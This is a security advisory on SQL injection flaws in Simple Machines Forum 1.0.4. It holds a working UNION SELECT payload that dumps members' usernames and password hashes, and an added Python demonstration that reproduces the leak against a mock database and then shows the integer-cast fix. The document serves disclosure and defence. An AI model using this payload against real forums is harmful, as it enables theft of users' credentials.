Simple Machines Forum SQL Injection
July 03, 2005
Vendor : Lewis Media
URL : http://www.simplemachines.org/
Version : SMF 1.0.4 And Earlier
Risk : SQL Injection


Description:
SMF, or Simple Machines Forum as it is probably better known, is a very popular forum system developed by members of the YaBB SE development team. Simple Machines Forum versions prior to the recently released 1.0.5 are vulnerable to a very serious SQL Injection hole, as well as a more obscure, harder to exploit SQL Injection hole. Both vulnerabilities have been resolved, and users should upgrade to the latest version of SMF immediately.


SQL Injection:
The first SQL Injection I will discuss is not easily exploitable under default conditions, but I will cover it anyway. Let's have a look at the vulnerable code in question. Search.php @ line 543

elseif (!$use_cache || $numResults <= $modSettings['search_results_per_page'])
{
$sort = array();
$request = db_query("
	SELECT
		t.ID_TOPIC, COUNT(m.ID_MSG) AS numMsg, MAX(m.ID_MSG) AS lastMatch, 
		MIN(m.ID_MSG) AS firstMatch,
		COUNT(m.ID_MSG) AS num_matches
	FROM {$db_prefix}topics AS t
		LEFT JOIN {$db_prefix}messages AS m ON (m.ID_TOPIC = t.ID_TOPIC AND 
		$searchQuery)" . (empty($userQuery) ? '
	WHERE t.ID_TOPIC IN (' . implode(', ', array_keys($matchingTopics)) . ')' : "
	WHERE $userQuery
		AND t.ID_TOPIC IN (" . implode(', ', array_keys($matchingTopics)) . ")") . "
	GROUP BY t.ID_TOPIC
	LIMIT $_REQUEST[start], $modSettings[search_results_per_page]",
	 __FILE__, __LINE__);
$tmp = array();
while ($row = mysql_fetch_assoc($request))


$_REQUEST[start] is interpolated unsanitized after the LIMIT keyword. MySQL refuses a UNION that follows an unparenthesized ORDER BY, but this query has no ORDER BY, so a UNION can still be appended after the LIMIT. The other SQL Injection issue is far more serious and allows an attacker to easily retrieve arbitrary data from the database. It is in the function getTopic():

// If you're modifying, get only those posts before the current one.
$request = db_query("
SELECT IFNULL(mem.realName, m.posterName) AS posterName, m.posterTime, m.body, 
m.smileysEnabled, m.ID_MSG
FROM {$db_prefix}messages AS m
    LEFT JOIN {$db_prefix}members AS mem ON (mem.ID_MEMBER = m.ID_MEMBER)
WHERE m.ID_TOPIC = $topic" . (isset($_REQUEST['msg']) ? "
    AND m.ID_MSG < $_REQUEST[msg]" : '') . "
ORDER BY m.ID_MSG DESC" . ($modSettings['topicSummaryPosts'] >= 0 ? '
LIMIT ' . (int) $modSettings['topicSummaryPosts'] : ''), __FILE__, __LINE__); 


As we can see, $_REQUEST[msg] is never sanitized and is placed right in the middle of a SELECT, making it highly exploitable.

http://smf/index.php?action=post;msg=1%20UNION%20SELECT%20memberName,0,passwd,
0,0%20FROM%20smf_members%20WHERE%201/*;topic=8.0;sesc=[VALIDSESCIDHERE]

The above request would dump every member's username and password hash from the members table into the comments area shown when editing a post: the UNION supplies five columns to match the original SELECT, and the trailing /* comments out the ORDER BY and LIMIT that follow. This vuln is very dangerous!
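To make the mechanics concrete, here is an added worked example (not code from the advisory or from SMF) that rebuilds the getTopic() query string in Python, runs it against an in-memory sqlite stand-in for the smf_members and smf_messages tables with constructed data, and feeds it the advisory's msg payload. It then shows one way to close the hole: casting the request value to an integer before interpolating it (php_int_cast mimics PHP's (int) conversion, which keeps only the leading numeric prefix). Note that quote-escaping would not help here, because the value sits in an unquoted numeric context. Table layouts, the row data and the "hash-of-..." strings are placeholders for this demonstration.

```python
import re
import sqlite3

# Constructed stand-ins for the SMF globals used by getTopic(); not SMF code.
DB_PREFIX = "smf_"
TOPIC_SUMMARY_POSTS = 10          # $modSettings['topicSummaryPosts']

# The advisory's msg payload, URL-decoded.
PAYLOAD = "1 UNION SELECT memberName,0,passwd,0,0 FROM smf_members WHERE 1/*"


def php_int_cast(value):
    """Mimic PHP's (int) cast on a string: leading integer prefix, else 0."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def build_topic_query(topic, msg_param=None, sanitize=False):
    """Rebuild the query from getTopic(). sanitize=False interpolates the raw
    request value as SMF 1.0.4 did; sanitize=True casts it to int first."""
    msg_clause = ""
    if msg_param is not None:
        msg = php_int_cast(msg_param) if sanitize else msg_param
        msg_clause = f"\n    AND m.ID_MSG < {msg}"
    limit = f"\nLIMIT {int(TOPIC_SUMMARY_POSTS)}" if TOPIC_SUMMARY_POSTS >= 0 else ""
    return (
        "SELECT IFNULL(mem.realName, m.posterName) AS posterName, m.posterTime, m.body,\n"
        "m.smileysEnabled, m.ID_MSG\n"
        f"FROM {DB_PREFIX}messages AS m\n"
        f"    LEFT JOIN {DB_PREFIX}members AS mem ON (mem.ID_MEMBER = m.ID_MEMBER)\n"
        f"WHERE m.ID_TOPIC = {int(topic)}{msg_clause}\n"
        "ORDER BY m.ID_MSG DESC" + limit
    )


def make_db():
    """In-memory sqlite stand-in for the two SMF tables, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {DB_PREFIX}members (
            ID_MEMBER INTEGER, memberName TEXT, realName TEXT, passwd TEXT);
        CREATE TABLE {DB_PREFIX}messages (
            ID_MSG INTEGER, ID_TOPIC INTEGER, ID_MEMBER INTEGER, posterName TEXT,
            posterTime INTEGER, body TEXT, smileysEnabled INTEGER);
        INSERT INTO {DB_PREFIX}members VALUES (1, 'admin', 'Admin', 'hash-of-admin-pw');
        INSERT INTO {DB_PREFIX}members VALUES (2, 'alice', 'Alice', 'hash-of-alice-pw');
        INSERT INTO {DB_PREFIX}messages VALUES (10, 8, 2, 'Alice', 0, 'first post', 1);
        INSERT INTO {DB_PREFIX}messages VALUES (11, 8, 1, 'Admin', 0, 'a reply', 1);
    """)
    return conn


def topic_summary(conn, topic, msg_param=None, sanitize=False):
    """Rows getTopic() would render in the topic summary while editing a post."""
    return conn.execute(build_topic_query(topic, msg_param, sanitize)).fetchall()


def leaked_credentials(rows):
    """The UNION lands memberName in the posterName column and passwd in the
    body column; pull those pairs out of the rendered rows."""
    return sorted((r[0], r[2]) for r in rows)


if __name__ == "__main__":
    db = make_db()
    print("-- vulnerable: raw $_REQUEST[msg] interpolated")
    print(build_topic_query(8, PAYLOAD))
    print(leaked_credentials(topic_summary(db, 8, PAYLOAD)))
    print("-- fixed: (int) cast collapses the payload to", php_int_cast(PAYLOAD))
    print(topic_summary(db, 8, PAYLOAD, sanitize=True))
    print(topic_summary(db, 8, "11", sanitize=True))
```

Run it stand-alone: the vulnerable branch prints the two (memberName, passwd) pairs because the first SELECT matches nothing (no message has ID_MSG < 1) and the unterminated /* swallows the ORDER BY and LIMIT, while the sanitized branch turns the payload into the integer 1 and returns no rows at all.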


Solution:
The SMF team were very prompt both in their response and in releasing a patched version. All users should upgrade to 1.0.5 or later now!


Credits:
James Bercegay of the GulfTech Security Research Team